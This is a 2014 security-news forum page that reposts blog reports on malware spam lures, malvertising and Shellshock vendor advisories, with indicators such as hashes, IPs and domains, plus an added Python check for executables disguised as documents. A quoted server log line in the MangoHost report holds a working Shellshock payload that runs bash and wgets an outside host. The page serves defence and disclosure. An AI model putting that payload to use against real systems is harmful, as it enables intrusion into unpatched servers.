News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
October 01, 2014, 20:22:06
 1 
 on: Today at 02:53:57 
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homicide-suspect-important-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
    From:     ALERT@ police .uk [ALERT@ police-uk .com]
    Date:     1 October 2014 08:49
    Subject:     Homicide Suspect - important
    Bulletin Headline: HOMICIDE SUSPECT
    Sending Agency: New York City Police
    Sending Location: NY - New York - New York City Police
    Bulletin Case#: 14-49627
    Bulletin Author: BARILLAS #1264
    Sending User #: 56521
    APBnet Version:
    The bulletin is a pdf file. To download please follow the link below ...


Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5e856b114844e8fadb5386403f9616c57b26562d5e1b78570a0525699474d738/analysis/1412150049/

** https://anubis.iseclab.org/?action=result&task_id=176a536785d2b80f411e27a2c10ba7dda&format=html
___

Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/something-evil-on-87118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."

87.118.127.230: https://www.virustotal.com/en/ip-address/87.118.127.230/information/
___

Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/uktservicescom-booking-cancellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
    From:     email@ uktservices .com
    Date:     1 October 2014 14:01
    Subject:     Booking Cancellation
    Hello.
    Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
    Here is a link to your updated bookings view...


All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."

37.235.56.121: https://www.virustotal.com/en/ip-address/37.235.56.121/information/
___

More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoice-08387-digital-fake-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/them_digital_email.png

There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently. Some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on your antivirus to protect you from these types of malware.
Today's date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/620ee072d3262102bd38c008fcf5a03ab44748d0f2cf6621079b768b1c7a89fc/analysis/1412153387/
___

Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbuild-copied-invoices-fake-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

get copies of invoices. We will not be able to pay them. Please send clear invoices

1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55*. This Cashbuild Copied invoices is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/80261645578f003d9961e1dd9438b27ee4bc14d27cf76bf8ab52db7f2f785961/analysis/1412156828/
___

GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 1 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___

DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/

** https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-hits-the-times-of-israel-newspaper/

*** https://www.virustotal.com/en/file/5378fdfdbbb87695d334c13b0b035d260a5934c071849ee000beec59c3ac7c26/analysis/1412048718/


 2 
 on: Today at 02:21:45 
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

VMSA-2014-0010 - VMware product updates address critical Bash security vulns
- http://www.vmware.com/security/advisories/VMSA-2014-0010.html
2014-09-30
CVE numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
1. Summary: VMware product updates address Bash security vulnerabilities.
2. Relevant Releases (Affected products for which remediation is present):
vCenter Log Insight 2.0
3. Problem Description
a. Bash update for multiple products: Bash libraries have been updated in multiple products to resolve multiple critical security issues, also referred to as Shellshock...
I) ESXi and ESX Hypervisor: ESXi is not affected because ESXi uses the Ash shell (through busybox), which is not affected by the vulnerability reported for the Bash shell. ESX has an affected version of the Bash shell.
II) Windows-based products: Windows-based products, including all versions of vCenter Server running on Windows, are not affected.
III) VMware (virtual) appliances: VMware (virtual) appliances ship with an affected version of Bash.
See table 2 for remediation for appliances.
IV) Products that run on Linux, Android, OSX or iOS (excluding virtual appliances)
Products that run on Linux, Android, OSX or iOS (excluding virtual appliances) might use the Bash shell that is part of the operating system. If the operating system has a vulnerable version of Bash, the Bash security vulnerability might be exploited through the product. VMware recommends that customers contact their operating system vendor for a patch.
MITIGATIONS: VMware encourages restricting access to appliances through firewall rules and other network layer controls to only trusted IP addresses. This measure will greatly reduce any risk to these appliances...
References: http://kb.vmware.com/kb/2090740
(More detail at the vmware URLs above.)

- http://www.securitytracker.com/id/1030943
CVE Reference: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes ...
... vulnerability is being actively exploited...
... advisory is available at: http://www.vmware.com/security/advisories/VMSA-2014-0010.html
... archive entry is a follow-up to: http://www.securitytracker.com/id/1030890


 3 
 on: September 30, 2014, 02:49:19  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-natwest-you-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

    NatWest: "You have a new Secure Message"
    From:     NatWest [secure.message@ natwest .com]
    Date:     30 September 2014 09:58
    Subject:     You have a new Secure Message - file-3800
    You have received a encrypted message from NatWest Customer Support
    In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
    Please download your ecnrypted message at ...

    "You've received a new fax"
    From:     Fax [fax@victimdomain .com]
    Date:     30 September 2014 09:57
    Subject:     You've received a new fax
    New fax at SCAN4148711 from EPSON by https ://victimdomain .com
    Scan date: Tue, 30 Sep 2014 14:27:24 +0530
    Number of pages: 2
    Resolution: 400x400 DPI
    You can secure download your fax message at ...


The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1b09eaabd81bb0a64dc297e1d8fbbde5892e97e43c1fcec237d9f4a4eaf0c566/analysis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
69.89.22.130: https://www.virustotal.com/en/ip-address/69.89.22.130/information/
___

Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-air-thank-order-fake-word-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Order Notification,
    E-TICKET NUMBER / ET-98191471
    SEAT / 79F/ZONE 1
    DATE / TIME 2 OCTOBER, 2014, 11:15 PM
    ARRIVING / Berlin
    FORM OF PAYMENT / XXXXXX
    TOTAL PRICE / 214.61 GBP
    REF / OE.2368 ST / OK
    BAG / 3PC
    Your electronic ticket is attached to the letter as a scan document.
    You can print your ticket.
    Thank you for your attention.
    Delta Air Lines.


30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55*. This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3761b84ab4ee6bded5fd2ed4717d84f73e749d733a2d8bb3765d62e0c4d9fd53/analysis/1412075964/


 4 
 on: September 29, 2014, 15:15:16  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

OS X bash Updates ...
- http://support.apple.com/kb/HT6495
Sep 29, 2014 - Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5
Impact: In certain configurations, a remote attacker may be able to execute arbitrary shell commands
Description: An issue existed in Bash's parsing of environment variables. This issue was addressed through improved environment variable parsing by better detecting the end of the function statement...

APPLE-SA-2014-09-29-1 OS X bash Update 1.0
- https://lists.apple.com/archives/security-announce/2014/Sep/msg00001.html
29 Sep 2014

OS X Lion
- http://support.apple.com/kb/DL1767
Sep 29, 2014
File Size: 3.5 MB

OS X Mountain Lion
- http://support.apple.com/kb/DL1768
Sep 29, 2014
File Size: 3.3 MB

OS X Mavericks
- http://support.apple.com/kb/DL1769
Sep 29, 2014
File Size: 3.3 MB

- http://arstechnica.com/apple/2014/09/apple-patches-shellshock-bash-bug-in-os-x-10-9-10-8-and-10-7/
Sept 29 2014


 5 
 on: September 29, 2014, 07:46:25  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-uk-remittance-advice-fake-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in the statement.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


Update: a slightly revised email coming out now but still the -same- malware attachment
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in statement.
    Any queries please contact us on 01934-524004.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55*. This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d8a6c8626cab8f4588254ce0d48460e9968ede774cc7c5b2b756ce4055e39d1d/analysis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-complete-office-solutions-fake-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54*. This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a7ad4bf44b21ca85233b2eb8f708b196df4226db37406e74b6e791f6f05c75ea/analysis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-address/82.165.38.206/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malware-spam-lloyds-commercial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
    Lloyds Commercial Bank "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     29 September 2014 11:03
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C947
    Case number: 18868193
    Please review BACs documents.
    Click link below, download and open document. (PDF Adobe file) ...

    HSBC Bank UK "Payment Advice Issued"
    From:     HSBC Bank UK
    Date:     29 September 2014 11:42
    Subject:     Payment Advice Issued
    Your payment advice is issued at the request of our customer. The advice is for your reference only.
    Please download your payment advice at ...


The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/file/75da79cb6c1911e83500f603d3432a942ee200a17b97f10a9160142b2261e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustotal.com/en/ip-address/184.154.253.181/information/
81.88.48.71: https://www.virustotal.com/en/ip-address/81.88.48.71/information/
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
___

Fake Order SPAM
- http://myonlinesecurity.co.uk/order-statsus-order-confirmation-9618161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
 Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
 Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
 Kind regards,
Sales Department
Tiana Haggin ...


Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
Current Virus total detections: 3/55*. This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/23a77e612c3f1b44ab4c440354efe3e4867eacb20c53a06a449986f1186e715d/analysis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
23.62.99.24: https://www.virustotal.com/en/ip-address/23.62.99.24/information/
213.186.33.4: https://www.virustotal.com/en/ip-address/213.186.33.4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-voicemail-message-suy-301-fake-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    The Voice Mail message has been uploaded to the following web
    address ...
    You can play this Voice Mail on most computers.
    Please do not reply to this message. This is an automated message which
    comes from an unattended mailbox.
    This information contained within this e-mail is confidential to, and is
    for the exclusive use of the addressee(s).
    If you are not the addressee, then any distribution, copying or use of this
    e-mail is prohibited.
    If received in error, please advise the sender and delete/destroy it
    immediately.
    We accept no liability for any loss or damage suffered by any person
    arising from use of this e-mail.


... the link in the email is broken because the idiots who crafted the email messed up the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55*. This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c622342a2b88e89827f4f020d05c4a622c6768ead460bc1d0ec9ce36b3a4ecb/analysis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/09/your-mailbox-has-exceeded-the-storage-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
    “Kindly Re-Validate Your Mailbox
    Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
    To renew the mailbox,
    click link below: [removed]
    Thank you!
    Web mail system administrator!
    WARNING! Protect your privacy. Logout when you are done and completely
    exit your browser.”


The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/shellshock-command-diagram-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Table-01.jpg

89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
108.162.197.26: https://www.virustotal.com/en/ip-address/108.162.197.26/information/
162.253.66.76: https://www.virustotal.com/en/ip-address/162.253.66.76/information/
213.5.67.223: https://www.virustotal.com/en/ip-address/213.5.67.223/information/

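Every spam sample in this post and the earlier ones relies on the same trick: an executable whose name (and icon) pretends to be a PDF, XLS, DOC or WAV. As an added example, not code from myonlinesecurity.co.uk, dynamoo.com or this forum, here is the check a mail gateway can apply to those attachment names: it reports the real extension, the document type the name is disguised as (a second extension such as .pdf.exe, or a `_pdf` token before .scr), and whether the delivery should be quarantined. The sample names are the ones quoted in the posts plus a few constructed benign ones; a file whose only disguise is its icon still trips the check because its final extension is executable.

```python
"""Flag mail attachments that masquerade as documents behind an executable
extension, the pattern every spam sample in these posts relies on.

Added example; not code from myonlinesecurity.co.uk or this forum.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Extensions Windows runs on double-click (a subset; extend for your gateway).
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js",
                   "jse", "wsf", "hta", "cpl"}
# Document/media types the lures in the posts pretend to be.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "txt", "jpg", "png"}
# A document token at the end of the stem, introduced by '.', '_' or '-':
# "Invoice.pdf" (double extension) or "file-viewonly7213_pdf" (token).
DOC_TOKEN_RE = re.compile(r"[._\-](%s)$" % "|".join(sorted(DOCUMENT_EXTS)))


@dataclass
class Verdict:
    name: str
    true_ext: str               # what the file really is, by its last extension
    claimed_ext: Optional[str]  # what the name pretends to be, if anything
    reason: str


def claimed_type(stem: str) -> Optional[str]:
    """Document type a (lowercased) stem pretends to be, or None."""
    m = DOC_TOKEN_RE.search(stem)
    return m.group(1) if m else None


def assess(name: str) -> Optional[Verdict]:
    """Return a Verdict for a suspicious file name, None for an unremarkable one."""
    stem, dot, ext = name.lower().rpartition(".")
    if not dot:
        return None                     # no extension at all
    claimed = claimed_type(stem)
    if ext in EXECUTABLE_EXTS:
        if claimed:
            return Verdict(name, ext, claimed, "executable disguised as %s" % claimed)
        # Icon spoofing (the .scr posing as a .wav) is invisible in the name,
        # but an executable attachment is reason enough on its own.
        return Verdict(name, ext, None, "executable attachment")
    if ext == "zip" and claimed:
        # Lower confidence: "Invoice 08387.pdf.zip" is how the lures are wrapped,
        # but a legitimate "report.pdf.zip" would look the same.
        return Verdict(name, ext, claimed, "archive named as a %s" % claimed)
    return None


def assess_delivery(container: str, members: List[str]) -> List[Verdict]:
    """Verdicts for the attachment itself and each name extracted from it."""
    return [v for v in map(assess, [container, *members]) if v is not None]


def should_quarantine(verdicts: List[Verdict]) -> bool:
    """Quarantine when anything in the delivery is actually executable."""
    return any(v.true_ext in EXECUTABLE_EXTS for v in verdicts)


# Attachment -> extracted contents, as quoted in the posts, followed by
# constructed benign deliveries.
SAMPLES = {
    "Them Digital Invoice 08387.pdf.zip": ["ThemDigital_Invoice_42559029506452623.pdf.exe"],
    "A Sales Invoice – By Account_SINV0612471.PDF.zip":
        ["A Sales Invoice – By Account_SINV0612471.xls.exe"],
    "ET-17843879.zip": ["DT-ET_5859799188.exe"],
    "voice448705888444.zip": ["voice448705888444.scr"],
    "file-viewonly7213_pdf.zip": ["file-viewonly7213_pdf.scr"],
    "document_8641_29092014_pdf.scr": [],             # delivered without a ZIP wrapper
    "Q3-report.pdf": [],                              # constructed, benign
    "photos.zip": ["IMG_0001.jpg", "IMG_0002.jpg"],   # constructed, benign
}


def report(samples=SAMPLES) -> List[str]:
    """One line per delivery with the gateway action, then one per verdict."""
    lines = []
    for container, members in samples.items():
        verdicts = assess_delivery(container, members)
        action = "QUARANTINE" if should_quarantine(verdicts) else "allow"
        lines.append("%-10s %s" % (action, container))
        for v in verdicts:
            lines.append("           - %s: %s" % (v.name, v.reason))
    return lines


if __name__ == "__main__":
    print("\n".join(report()))
```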

 6 
 on: September 28, 2014, 02:35:20  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server and attempting to WGET back to their own network to enumerate vulnerable hosts.
   dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/

83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___

Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223*
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues:
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."


 7 
 on: September 27, 2014, 05:27:25  
Started by AplusWebMaster - Last post by AplusWebMaster
FYI...

Oracle - Security Alert CVE-2014-7169 released
- https://blogs.oracle.com/security/entry/security_alert_cve_2014_7169
Sep 26, 2014 - "Oracle just released Security Alert CVE-2014-7169*. Vulnerability CVE-2014-7169, previously known as CVE-2014-6271, affects GNU Bash, and if successfully exploited can result in providing a malicious attacker the ability to fully compromise a targeted system... Today’s Security Alert lists the products that Oracle has currently determined to be vulnerable to CVE-2014-7169. Download and installation instructions are provided for those products with available patches. Note that the fixes provided with this Security Alert address both vulnerabilities CVE-2014-7169 and CVE-2014-6271. The Security Alert Advisory will be updated to reflect the availability of fixes for additional products when they have successfully completed testing..."  
* http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html

- http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html#PIN
